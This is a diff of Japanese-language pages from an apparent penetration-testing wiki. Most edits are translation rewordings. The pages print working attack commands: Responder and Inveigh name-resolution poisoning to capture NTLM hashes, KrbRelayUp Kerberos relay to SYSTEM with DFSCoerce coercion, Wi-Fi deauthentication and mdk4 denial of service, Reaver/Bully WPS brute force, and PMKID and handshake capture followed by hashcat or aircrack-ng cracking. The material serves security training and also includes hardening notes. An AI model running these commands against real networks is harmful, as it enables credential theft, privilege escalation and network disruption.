[https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904) - [Practical Guide to IPv6 Attacks in a Local Network](https://habr.com/ru/articles/930526/) +- [FiberGateway GR241AG – Full Exploit Chain](https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index 4b579bb6b..4dfea9f97 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md @@ -9,28 +9,28 @@ - **LLMNR、NBT-NS、およびmDNS**: - Microsoftおよび他のオペレーティングシステムは、DNSが失敗した場合にローカル名解決のためにLLMNRおよびNBT-NSを使用します。同様に、AppleおよびLinuxシステムはmDNSを使用します。 - これらのプロトコルは、UDP上での認証されていないブロードキャストの性質のため、傍受およびスプーフィングに対して脆弱です。 -- [Responder](https://github.com/lgandx/Responder)は、これらのプロトコルを照会するホストに対して偽の応答を送信することでサービスを偽装するために使用できます。 +- [Responder](https://github.com/lgandx/Responder)は、これらのプロトコルを照会しているホストに対して偽の応答を送信することでサービスを偽装するために使用できます。 - Responderを使用したサービスの偽装に関する詳細情報は[こちら](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)で確認できます。 ### ウェブプロキシ自動検出プロトコル (WPAD) - WPADは、ブラウザがプロキシ設定を自動的に発見することを可能にします。 -- 発見は、DHCP、DNSを介して行われ、DNSが失敗した場合はLLMNRおよびNBT-NSにフォールバックします。 +- 発見はDHCP、DNSを介して行われ、DNSが失敗した場合はLLMNRおよびNBT-NSにフォールバックします。 - ResponderはWPAD攻撃を自動化し、クライアントを悪意のあるWPADサーバーに誘導します。 ### プロトコルポイズニングのためのResponder - **Responder**は、LLMNR、NBT-NS、およびmDNSクエリをポイズニングするために使用されるツールで、主にSMBサービスをターゲットにしてクエリタイプに基づいて選択的に応答します。 - Kali Linuxにプリインストールされており、`/etc/responder/Responder.conf`で設定可能です。 -- Responderは、キャプチャしたハッシュを画面に表示し、`/usr/share/responder/logs`ディレクトリに保存します。 +- Responderはキャプチャしたハッシュを画面に表示し、`/usr/share/responder/logs`ディレクトリに保存します。 - IPv4およびIPv6の両方をサポートしています。 - Windows版のResponderは[こちら](https://github.com/lgandx/Responder-Windows)で入手できます。 #### Responderの実行 - デフォルト設定でResponderを実行するには: `responder -I ` -- より攻撃的なプロービングを行うには(潜在的な副作用あり): `responder -I -P -r -v` -- NTLMv1チャレンジ/レスポンスをキャプチャしてクラックを容易にするための技術: `responder -I --lm --disable-ess` +- より攻撃的なプロービングを行うには(副作用の可能性あり): `responder -I -P -r -v` +- NTLMv1チャレンジ/レスポンスをキャプチャしてクラックを容易にする技術: `responder -I --lm --disable-ess` - WPADの偽装を有効にするには: `responder -I --wpad` - NetBIOSリクエストを攻撃者のIPに解決し、認証プロキシを設定するには: `responder.py -I -Pv` @@ -39,7 +39,7 @@ - DHCP応答をスプーフィングすることで、被害者のルーティング情報を永続的にポイズンし、ARPポイズニングに対するよりステルスな代替手段を提供します。 - これは、ターゲットネットワークの構成に関する正確な知識を必要とします。 - 攻撃を実行するには: `./Responder.py -I eth0 -Pdv` -- この方法はNTLMv1/2ハッシュを効果的にキャプチャできますが、ネットワークの中断を避けるために慎重な取り扱いが必要です。 +- この方法はNTLMv1/2ハッシュを効果的にキャプチャできますが、ネットワークの混乱を避けるために慎重な取り扱いが必要です。 ### Responderを使用した資格情報のキャプチャ @@ -50,7 +50,7 @@ ## Inveigh -Inveighは、Windowsシステム向けに設計されたペネトレーションテスターおよびレッドチーム用のツールです。Responderと同様の機能を提供し、スプーフィングおよび中間者攻撃を実行します。このツールは、PowerShellスクリプトからC#バイナリに進化し、[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh)および[**InveighZero**](https://github.com/Kevin-Robertson/InveighZero)が主要なバージョンです。詳細なパラメータと指示は[**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters)で確認できます。 +Inveighは、Windowsシステム向けに設計されたペネトレーションテスターおよびレッドチーム向けのツールです。Responderと同様の機能を提供し、スプーフィングおよび中間者攻撃を実行します。このツールは、PowerShellスクリプトからC#バイナリに進化し、[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh)および[**InveighZero**](https://github.com/Kevin-Robertson/InveighZero)が主要なバージョンです。詳細なパラメータと指示は[**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters)で確認できます。 InveighはPowerShellを通じて操作できます: ```bash @@ -109,7 +109,7 @@ python MultiRelay.py -t -u ALL -d # Dump hashes ### NTLMログインの強制 -Windowsでは、**特権アカウントが任意のマシンに認証するよう強制できる場合があります**。方法を学ぶには、以下のページを参照してください: +Windowsでは、**特権アカウントが任意のマシンに認証するよう強制できる場合があります**。方法を学ぶには、以下のページを読んでください: {{#ref}} ../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md @@ -117,9 +117,9 @@ Windowsでは、**特権アカウントが任意のマシンに認証するよ ## Kerberosリレー攻撃 -**Kerberosリレー攻撃**は、あるサービスから**AP-REQチケット**を盗み、**同じコンピュータアカウントキー**を共有する別のサービスに再利用します(両方のSPNが同じ`$`マシンアカウントに存在するため)。これは、SPNの**サービスクラスが異なっていても**機能します(例:`CIFS/` → `LDAP/`)。なぜなら、チケットを復号化するための*キー*はマシンのNTハッシュであり、SPN文字列自体ではなく、SPN文字列は署名の一部ではないからです。 +**Kerberosリレー攻撃**は、1つのサービスから**AP-REQチケット**を盗み、**同じコンピュータアカウントキー**を共有する2つ目のサービスに再利用します(両方のSPNが同じ`$`マシンアカウントに存在するため)。これは、SPNの**サービスクラスが異なっていても**(例:`CIFS/` → `LDAP/`)、チケットを復号化するための*キー*がマシンのNTハッシュであり、SPN文字列自体ではなく、SPN文字列が署名の一部ではないため機能します。 -NTLMリレーとは異なり、ホップは*同じホスト*に制限されますが、LDAPに書き込むことを許可するプロトコルをターゲットにすると、**リソースベースの制約付き委任(RBCD)**や**AD CS登録**にチェーン接続し、**NT AUTHORITY\SYSTEM**を一度で取得できます。 +NTLMリレーとは異なり、ホップは*同じホスト*に制限されますが、LDAPに書き込むことを許可するプロトコルをターゲットにすると、**リソースベースの制約付き委任(RBCD)**または**AD CS登録**にチェーンし、1回の操作で**NT AUTHORITY\SYSTEM**を取得できます。 この攻撃に関する詳細情報は以下を確認してください: @@ -131,8 +131,8 @@ NTLMリレーとは異なり、ホップは*同じホスト*に制限されま | トークン | 目的 | リレーの関連性 | |-------|---------|-----------------| | **TGT / AS-REQ ↔ REP** | KDCに対するユーザーの証明 | 影響なし | -| **サービスチケット / TGS-REQ ↔ REP** | 一つの**SPN**にバウンド; SPN所有者のキーで暗号化 | アカウントを共有するSPNの場合は相互交換可能 | -| **AP-REQ** | クライアントがサービスに`TGS`を送信 | **私たちが盗むもの & 再生するもの** | +| **サービスチケット / TGS-REQ ↔ REP** | 1つの**SPN**にバウンド; SPN所有者のキーで暗号化 | アカウントを共有するSPNの場合は相互交換可能 | +| **AP-REQ** | クライアントがサービスに`TGS`を送信 | **私たちが盗んで再生するもの** | * チケットは**SPNを所有するアカウントのパスワード由来のキー**で暗号化されています。 * AP-REQ内の**Authenticator**には5分のタイムスタンプがあり、そのウィンドウ内での再生はサービスキャッシュが重複を検出するまで有効です。 @@ -140,11 +140,11 @@ NTLMリレーとは異なり、ホップは*同じホスト*に制限されま - 2. **Kerberosをリレーするために必要な条件** -1. **共有キー:** ソースとターゲットのSPNが同じコンピュータアカウントに属している(Windowsサーバーではデフォルト)。 +1. **共有キー:** ソースとターゲットのSPNは同じコンピュータアカウントに属する(Windowsサーバーではデフォルト)。 2. **チャネル保護なし:** SMB/LDAP署名オフ、HTTP/LDAPSのEPAオフ。 3. **認証を傍受または強制できる:** LLMNR/NBNSポイズン、DNSスプーフ、**PetitPotam / DFSCoerce RPC**、偽のAuthIP、悪意のあるDCOMなど。 -4. **チケットソースがすでに使用されていない:** 実際のパケットが到達する前にレースに勝つか、完全にブロックする必要があります。そうでない場合、サーバーの再生キャッシュがイベント4649を発火します。 -5. 何らかの方法で**通信のMitMを実行できる必要があります**。ドメインのDNSを変更するためにDNSAminsグループの一部であるか、被害者のHOSTファイルを変更できる必要があります。 +4. **チケットソースがすでに使用されていない:** 実際のパケットが到達する前にレースに勝つか、完全にブロックする。そうでなければ、サーバーの再生キャッシュがイベント4649を発火させます。 +5. 何らかの方法で**通信のMitMを実行できる必要がある**。ドメインのDNSを変更するためにDNSAminsグループの一部であるか、被害者のHOSTファイルを変更できる必要があります。 ### Kerberosリレー手順 @@ -162,9 +162,9 @@ Select Name,servicePrincipalName # one-click local SYSTEM via RBCD .\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 ``` -`KrbRelayUp`は**KrbRelay → LDAP → RBCD → Rubeus → SCMバイパス**を1つのバイナリにまとめています。 +`KrbRelayUp` は **KrbRelay → LDAP → RBCD → Rubeus → SCM バイパス** を1つのバイナリにまとめています。 -- 3.3 **Kerberos認証を強制する** +- 3.3 **Kerberos 認証を強制する** ```powershell # coerce DC to auth over SMB with DFSCoerce .\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50 @@ -187,7 +187,7 @@ SCMUACBypass.exe ### **知っておくべきその他のパス** -| ベクター | トリック | 重要性 | +| ベクター | トリック | 重要な理由 | |--------|-------|----------------| | **AuthIP / IPSec** | 偽のサーバーが任意のSPNを持つ**GSS-IDペイロード**を送信; クライアントはあなたに直接AP-REQを構築 | サブネットを越えても機能; デフォルトでマシンクレデンシャル | | **DCOM / MSRPC** | 悪意のあるOXIDリゾルバーがクライアントに任意のSPNとポートに認証させる | 純粋な*ローカル*特権昇格; ファイアウォールを回避 | @@ -199,8 +199,8 @@ SCMUACBypass.exe | エラー | 意味 | 修正 | |-------|---------|-----| | `KRB_AP_ERR_MODIFIED` | チケットキー ≠ ターゲットキー | ホスト/SPNが間違っている | -| `KRB_AP_ERR_SKEW` | 時計が5分以上のオフセット | 時間を同期するか`w32tm`を使用 | -| LDAPバインド失敗 | 署名が強制されている | AD CSパスを使用するか署名を無効にする | +| `KRB_AP_ERR_SKEW` | 時計が5分以上のオフセット | 時間を同期するか、`w32tm`を使用 | +| LDAPバインド失敗 | 署名が強制されている | AD CSパスを使用するか、署名を無効にする | | イベント4649のスパム | サービスが重複した認証子を検出 | 元のパケットをブロックまたは競争 | ### **検出** @@ -212,7 +212,7 @@ SCMUACBypass.exe ## **ハードニング** -1. **すべてのサーバーでLDAPおよびSMB署名 + EPAを強制**。 +1. すべてのサーバーで**LDAP & SMB署名 + EPA**を強制する。 2. **SPNを分割**し、HTTPがCIFS/LDAPと同じアカウントにないようにする。 3. 強制ベクターをパッチ(PetitPotam KB5005413、DFS、AuthIP)。 4. **`ms-DS-MachineAccountQuota = 0`**を設定して不正なコンピュータの参加を防ぐ。 diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/README.md b/src/generic-methodologies-and-resources/pentesting-wifi/README.md index 7fac4f02f..c3b2bf55e 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -21,6 +21,7 @@ iwlist wlan0 scan #Scan available wifis ### Hijacker & NexMon (Android内部Wi-Fi) + {{#ref}} enable-nexmon-monitor-and-injection-on-android.md {{#endref}} @@ -30,7 +31,7 @@ enable-nexmon-monitor-and-injection-on-android.md git clone https://github.com/s0lst1c3/eaphammer.git ./kali-setup ``` -### エアゲドン +### Airgeddon ```bash mv `which dhcpd` `which dhcpd`.old apt install isc-dhcp-server @@ -51,7 +52,7 @@ v1s1t0r1sh3r3/airgeddon ``` ### wifiphisher -Evil Twin、KARMA、既知ビーコン攻撃を実行し、フィッシングテンプレートを使用してネットワークの本当のパスワードを取得したり、ソーシャルネットワークの認証情報をキャプチャしたりすることができます。 +Evil Twin、KARMA、および既知のビーコン攻撃を実行し、その後フィッシングテンプレートを使用してネットワークの本当のパスワードを取得したり、ソーシャルネットワークの認証情報をキャプチャしたりすることができます。 ```bash git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision cd wifiphisher # Switch to tool's directory @@ -68,7 +69,7 @@ sudo python setup.py install # Install any dependencies - WPSの場合:Pixie dust攻撃とブルートフォース攻撃(ブルートフォース攻撃は時間がかかる可能性があるため注意してください)。ヌルPINやデータベース/生成されたPINを試みないことに注意してください。 - APからPMKIDをキャプチャしてクラックを試みる - APのクライアントを非認証にしてハンドシェイクをキャプチャする -- PMKIDまたはハンドシェイクがある場合、上位5000のパスワードを使用してブルートフォースを試みる。 +- PMKIDまたはハンドシェイクがあれば、上位5000のパスワードを使用してブルートフォースを試みる。 ## 攻撃の概要 @@ -89,7 +90,7 @@ sudo python setup.py install # Install any dependencies - **ブルートフォース** 認証情報 - **イービルツイン**(DoSの有無にかかわらず) - **オープン** イービルツイン \[+ DoS] -- キャプティブポータルの認証情報をキャプチャしたり、LAN攻撃を行うのに便利 -- **WPA-PSK** イービルツイン -- パスワードを知っている場合、ネットワーク攻撃に便利 +- **WPA-PSK** イービルツイン -- パスワードを知っていればネットワーク攻撃に便利 - **WPA-MGT** -- 会社の認証情報をキャプチャするのに便利 - **KARMA, MANA**, **Loud MANA**, **Known beacon** - **+ オープン** -- キャプティブポータルの認証情報をキャプチャしたり、LAN攻撃を行うのに便利 @@ -101,7 +102,7 @@ sudo python setup.py install # Install any dependencies **説明は** [**こちら**:](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.** -**非認証**攻撃は、Wi-Fiハッキングで一般的な手法であり、「管理」フレームを偽造して**ネットワークからデバイスを強制的に切断**します。これらの暗号化されていないパケットは、クライアントに正当なネットワークからのものであると信じ込ませ、攻撃者がクラック目的でWPAハンドシェイクを収集したり、ネットワーク接続を持続的に妨害したりすることを可能にします。この戦術は、その単純さにおいて驚くべきものであり、広く使用されており、ネットワークセキュリティに重大な影響を与えます。 +**非認証**攻撃は、Wi-Fiハッキングで一般的な手法であり、「管理」フレームを偽造して**デバイスをネットワークから強制的に切断**します。これらの暗号化されていないパケットは、クライアントに正当なネットワークからのものであると信じ込ませ、攻撃者がクラック目的でWPAハンドシェイクを収集したり、ネットワーク接続を持続的に妨害したりすることを可能にします。この戦術は、その単純さにおいて驚くべきものであり、広く使用されており、ネットワークセキュリティに重大な影響を与えます。 **Aireplay-ngを使用した非認証** ``` @@ -115,7 +116,7 @@ aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 ### 切断パケット -**切断パケット**は、非認証パケットと同様に、Wi-Fiネットワークで使用される管理フレームの一種です。これらのパケットは、デバイス(ノートパソコンやスマートフォンなど)とアクセスポイント(AP)との接続を切断するために使用されます。切断と非認証の主な違いは、その使用シナリオにあります。APは**ネットワークから不正なデバイスを明示的に削除するために非認証パケットを発信しますが、切断パケットは通常、APがシャットダウン、再起動、または移動している際に送信され、すべての接続ノードの切断が必要となります**。 +**切断パケット**は、非認証パケットと同様に、Wi-Fiネットワークで使用される管理フレームの一種です。これらのパケットは、デバイス(ノートパソコンやスマートフォンなど)とアクセスポイント(AP)との接続を切断するために使用されます。切断と非認証の主な違いは、その使用シナリオにあります。APは**ネットワークから不正なデバイスを明示的に削除するために非認証パケットを発信しますが、切断パケットは通常、APがシャットダウン、再起動、または移動している際に送信され、すべての接続ノードの切断が必要となります。** **この攻撃はmdk4(モード"d")で実行できます:** ```bash @@ -130,9 +131,9 @@ mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F **ここに** [**あります**](https://en.kali.tools/?p=864)**.** -**攻撃モード b: ビーコントラフィックの洪水** +**攻撃モード b: ビーコンドフラッディング** -クライアントに偽のAPを表示するためにビーコントラフィックを送信します。これにより、ネットワークスキャナーやドライバーがクラッシュすることがあります! +クライアントに偽のAPを表示するためにビーコントフレームを送信します。これにより、ネットワークスキャナーやドライバーがクラッシュすることがあります! ```bash # -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit # -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES) @@ -156,7 +157,7 @@ mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m **ATTACK MODE m: Michael Countermeasures Exploitation** -異なるQoSキューにランダムまたは重複したパケットを送信することで、**TKIP APs**上でマイケル対策がトリガーされ、APが1分間シャットダウンします。この方法は、効率的な**DoS**(サービス拒否)攻撃戦術です。 +ランダムまたは重複したパケットを異なるQoSキューに送信することで、**TKIP APs**上でマイケル対策をトリガーし、1分間のAPシャットダウンを引き起こすことができます。この方法は効率的な**DoS**(サービス拒否)攻撃戦術です。 ```bash # -t of a TKIP AP # -j use inteligent replay to create the DoS @@ -175,14 +176,14 @@ mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l] **ATTACK MODE w: WIDS 混乱** -クライアントを複数の WDS ノードや偽のロゲ AP にクロス接続することで、侵入検知および防止システムを操作し、混乱やシステムの悪用の可能性を生み出すことができます。 +クライアントを複数の WDS ノードや偽の悪意のある AP にクロス接続することで、侵入検知および防止システムを操作し、混乱やシステムの悪用の可能性を生み出すことができます。 ```bash # -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts) mkd4 -e -c [-z] ``` **ATTACK MODE f: Packet Fuzzer** -パケット操作のための多様なパケットソースと包括的な修飾子セットを備えたパケットファズァ。 +多様なパケットソースとパケット操作のための包括的な修飾子を備えたパケットファズァ。 ### **Airggedon** @@ -192,7 +193,7 @@ _**Airgeddon**_ は、前のコメントで提案されたほとんどの攻撃 ## WPS -WPS (Wi-Fi Protected Setup) は、デバイスをルーターに接続するプロセスを簡素化し、**WPA** または **WPA2** Personal で暗号化されたネットワークのセットアップ速度と容易さを向上させます。容易に侵害されるWEPセキュリティには効果がありません。WPSは8桁のPINを使用し、2つの半分で検証されるため、組み合わせの数が限られている(11,000通り)ため、ブルートフォース攻撃に対して脆弱です。 +WPS (Wi-Fi Protected Setup) は、デバイスをルーターに接続するプロセスを簡素化し、**WPA** または **WPA2** Personal で暗号化されたネットワークのセットアップ速度と容易さを向上させます。WEPセキュリティに対しては効果がありません。WPSは8桁のPINを使用し、2つの半分で検証されるため、組み合わせの数が限られている(11,000の可能性)ため、ブルートフォース攻撃に対して脆弱です。 ### WPS Bruteforce @@ -201,9 +202,9 @@ WPS (Wi-Fi Protected Setup) は、デバイスをルーターに接続するプ - **Reaver** は、WPSに対する堅牢で実用的な攻撃として設計されており、さまざまなアクセスポイントとWPS実装に対してテストされています。 - **Bully** は、Cで書かれたWPSブルートフォース攻撃の**新しい実装**です。元のReaverコードに対していくつかの利点があります:依存関係が少ない、メモリとCPUのパフォーマンスが向上、エンディアンの正しい処理、より堅牢なオプションセット。 -この攻撃は、**WPS PINの脆弱性**を利用し、特に最初の4桁の露出と最後の桁のチェックサムとしての役割がブルートフォース攻撃を容易にします。しかし、攻撃者の攻撃的なMACアドレスを**ブロックする**などのブルートフォース攻撃に対する防御は、攻撃を続けるために**MACアドレスのローテーション**を要求します。 +この攻撃は、**WPS PINの脆弱性**を利用し、特に最初の4桁の数字の露出と最後の桁のチェックサムとしての役割がブルートフォース攻撃を容易にします。しかし、攻撃者の攻撃を防ぐためのブルートフォース攻撃に対する防御策、例えば**攻撃者のMACアドレスをブロックする**ことは、攻撃を続けるために**MACアドレスのローテーション**を要求します。 -BullyやReaverのようなツールでWPS PINを取得すると、攻撃者はWPA/WPA2 PSKを推測でき、**持続的なネットワークアクセス**を確保します。 +BullyやReaverのようなツールを使用してWPS PINを取得すると、攻撃者はWPA/WPA2 PSKを推測でき、**持続的なネットワークアクセス**を確保します。 ```bash reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3 @@ -217,7 +218,7 @@ bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3 ### WPSピクシーダスト攻撃 -**ドミニク・ボンガール**は、秘密コードの作成に関するいくつかのアクセスポイント(AP)の欠陥を発見しました。これらは**ノンス**(**E-S1**および**E-S2**)として知られています。これらのノンスが特定できれば、APのWPS PINを解読するのが容易になります。APは、正当であり偽の(ロゲ)APではないことを証明するために、特別なコード(ハッシュ)内にPINを公開します。これらのノンスは、WPS PINを保持する「金庫」を解錠するための「鍵」として機能します。これに関する詳細は[こちら]()で確認できます。 +**ドミニク・ボンガール**は、秘密コードの作成に関するいくつかのアクセスポイント(AP)の欠陥を発見しました。これらは**ノンス**(**E-S1**および**E-S2**)として知られています。これらのノンスが特定できれば、APのWPS PINを解読するのは簡単になります。APは、正当であり偽の(ロゲ)APではないことを証明するために、特別なコード(ハッシュ)内にPINを公開します。これらのノンスは、WPS PINを保持する「金庫」を解錠するための「鍵」として機能します。これに関する詳細は[こちら]()で確認できます。 簡単に言うと、問題は、一部のAPが接続プロセス中にPINを暗号化するために十分にランダムな鍵を使用していなかったことです。これにより、PINがネットワーク外から推測される脆弱性が生じます(オフラインブルートフォース攻撃)。 ```bash @@ -260,15 +261,15 @@ reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p '' ### PMKID -2018年、**hashcat**は[新しい攻撃方法](https://hashcat.net/forum/thread-7717.html)を明らかにしました。この方法は、**1つのパケット**だけを必要とし、ターゲットAPにクライアントが接続されている必要がないため、ユニークです—攻撃者とAPの間の相互作用だけが必要です。 +2018年、**hashcat**は[新しい攻撃方法](https://hashcat.net/forum/thread-7717.html)を明らかにしました。この方法は、**1つのパケット**だけを必要とし、ターゲットAPに接続されているクライアントを必要としないため、ユニークです—攻撃者とAPの間の相互作用だけが必要です。 -多くの現代のルーターは、関連付け中に**最初のEAPOL**フレームに`Robust Security Network`として知られる**オプションフィールド**を追加します。これには`PMKID`が含まれます。 +多くの現代のルーターは、関連付け中に**最初のEAPOL**フレームに**オプションのフィールド**を追加します。これを`Robust Security Network`と呼びます。これには`PMKID`が含まれます。 -元の投稿が説明するように、**PMKID**は既知のデータを使用して作成されます: +元の投稿が説明しているように、**PMKID**は既知のデータを使用して作成されます: ```bash PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA) ``` -"PMK Name"が一定であることから、APのBSSIDとステーションのBSSIDが分かり、`PMK`が完全な4-way handshakeのものと同一であるため、**hashcat**はこの情報を使用してPSKを解読し、パスフレーズを回復できます! +"PMK Name"が一定であること、APとステーションのBSSIDがわかっており、`PMK`が完全な4-wayハンドシェイクのものと同一であることから、**hashcat**はこの情報を使用してPSKをクラッキングし、パスフレーズを回復できます! この情報を**収集**し、パスワードをローカルで**ブルートフォース**するには、次のようにします: ```bash @@ -282,14 +283,14 @@ hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1 #You can also obtains PMKIDs using eaphammer ./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1 ``` -キャプチャされた **PMKIDs** は **コンソール** に表示され、また **/tmp/attack.pcap** に **保存** されます。\ -次に、キャプチャを **hashcat/john** 形式に変換してクラックします: +キャプチャされた **PMKIDs** は **コンソール** に表示され、また **/tmp/attack.pcap** に保存されます。\ +次に、キャプチャを **hashcat/john** 形式に変換し、クラックします: ```bash hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt ``` -正しいハッシュの形式は**4つの部分**を含むことに注意してください。例: `4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838` あなたのハッシュが**3つの部分**しか含まれていない場合、それは**無効**です(PMKIDキャプチャが無効でした)。 +正しいハッシュの形式は**4つの部分**を含むことに注意してください。例: `4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838` あなたのハッシュが**3つの部分**しか含まない場合、それは**無効**です(PMKIDキャプチャが無効でした)。 `hcxdumptool`は**ハンドシェイクもキャプチャ**します(このようなものが表示されます: **`MP:M1M2 RC:63258 EAPOLTIME:17091`**)。あなたは`cap2hccapx`を使用して**ハンドシェイク**を**hashcat**/**john**形式に**変換**することができます。 ```bash @@ -306,11 +307,11 @@ aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes **WPA/WPA2** ネットワークへの攻撃は、**ハンドシェイク**をキャプチャし、パスワードを**オフライン**で**クラック**しようとすることで実行できます。このプロセスは、特定のネットワークと**BSSID**の通信を監視することを含みます。以下は簡潔なガイドです: 1. 対象ネットワークの**BSSID**、**チャネル**、および**接続されたクライアント**を特定します。 -2. `airodump-ng`を使用して、指定されたチャネルとBSSIDのネットワークトラフィックを監視し、ハンドシェイクをキャプチャすることを期待します。コマンドは次のようになります: +2. 指定されたチャネルとBSSIDでネットワークトラフィックを監視するために`airodump-ng`を使用し、ハンドシェイクをキャプチャすることを期待します。コマンドは次のようになります: ```bash airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap ``` -3. ハンドシェイクをキャプチャする確率を高めるために、クライアントをネットワークから一時的に切断して再認証を強制します。これは、クライアントに対して非認証パケットを送信する `aireplay-ng` コマンドを使用して行うことができます: +3. ハンドシェイクをキャプチャするチャンスを増やすために、クライアントをネットワークから一時的に切断して再認証を強制します。これは、クライアントに対して非認証パケットを送信する `aireplay-ng` コマンドを使用して行うことができます: ```bash aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios ``` @@ -320,7 +321,7 @@ _クライアントが非認証状態になったため、別のAPに接続し ![](<../../images/image (172) (1).png>) -ハンドシェイクがキャプチャされたら、`aircrack-ng`で**クラック**できます: +ハンドシェイクがキャプチャされたら、`aircrack-ng`を使って**クラック**できます: ``` aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap ``` @@ -347,7 +348,7 @@ pyrit -r psk-01.cap analyze ``` ## **WPAエンタープライズ (MGT)** -**エンタープライズWiFiセットアップでは、さまざまな認証方法に出会います**。それぞれ異なるセキュリティレベルと管理機能を提供します。`airodump-ng`のようなツールを使用してネットワークトラフィックを検査すると、これらの認証タイプの識別子に気付くかもしれません。一般的な方法には次のものが含まれます: +**エンタープライズWiFiセットアップでは、さまざまな認証方法に出会います**。各方法は異なるセキュリティレベルと管理機能を提供します。`airodump-ng`のようなツールを使用してネットワークトラフィックを検査すると、これらの認証タイプの識別子に気付くかもしれません。一般的な方法には次のようなものがあります: ``` 6A:FE:3B:73:18:FB -58 19 0 0 1 195 WPA2 CCMP MGT NameOfMyWifi ``` @@ -358,11 +359,11 @@ pyrit -r psk-01.cap analyze 3. **EAP-TLS (Transport Layer Security)**: - 認証のためにクライアント側とサーバー側の証明書の両方を利用し、通信を保護するためにユーザー基盤およびセッション基盤のWEPキーを動的に生成できます。 4. **EAP-TTLS (Tunneled Transport Layer Security)**: -- 暗号化されたトンネルを通じて相互認証を提供し、動的なユーザーごとのセッションごとのWEPキーを導出する方法を提供します。サーバー側の証明書のみを必要とし、クライアントは資格情報を使用します。 +- 暗号化されたトンネルを通じて相互認証を提供し、動的なユーザーごとのセッションごとのWEPキーを導出する方法を提供します。サーバー側の証明書のみが必要で、クライアントは資格情報を使用します。 5. **PEAP (Protected Extensible Authentication Protocol)**: - 保護された通信のためにTLSトンネルを作成することでEAPと同様に機能します。トンネルによって提供される保護のため、EAPの上に弱い認証プロトコルを使用することができます。 - **PEAP-MSCHAPv2**: 一般にPEAPと呼ばれ、脆弱なMSCHAPv2チャレンジ/レスポンスメカニズムと保護されたTLSトンネルを組み合わせています。 -- **PEAP-EAP-TLS (または PEAP-TLS)**: EAP-TLSに似ていますが、証明書を交換する前にTLSトンネルを開始し、追加のセキュリティ層を提供します。 +- **PEAP-EAP-TLS (またはPEAP-TLS)**: EAP-TLSに似ていますが、証明書を交換する前にTLSトンネルを開始し、追加のセキュリティ層を提供します。 これらの認証方法についての詳細は[こちら](https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol)と[こちら](https://www.intel.com/content/www/us/en/support/articles/000006999/network-and-i-o/wireless-networking.html)で確認できます。 @@ -370,8 +371,8 @@ pyrit -r psk-01.cap analyze [https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/html/rfc3748#page-27)を読むと、**EAP**を使用している場合、**"Identity"** **メッセージ**は**サポートされている**必要があり、**ユーザー名**は**"Response Identity"**メッセージで**クリア**で送信されることがわかります。 -最も安全な認証方法の一つである**PEAP-EAP-TLS**を使用しても、**EAPプロトコルで送信されたユーザー名をキャプチャする**ことが可能です。そのためには、**認証通信をキャプチャ**します(チャンネル内で`airodump-ng`を開始し、同じインターフェースで`wireshark`を使用)し、パケットを`eapol`でフィルタリングします。\ -"**Response, Identity**"パケット内に、クライアントの**ユーザー名**が表示されます。 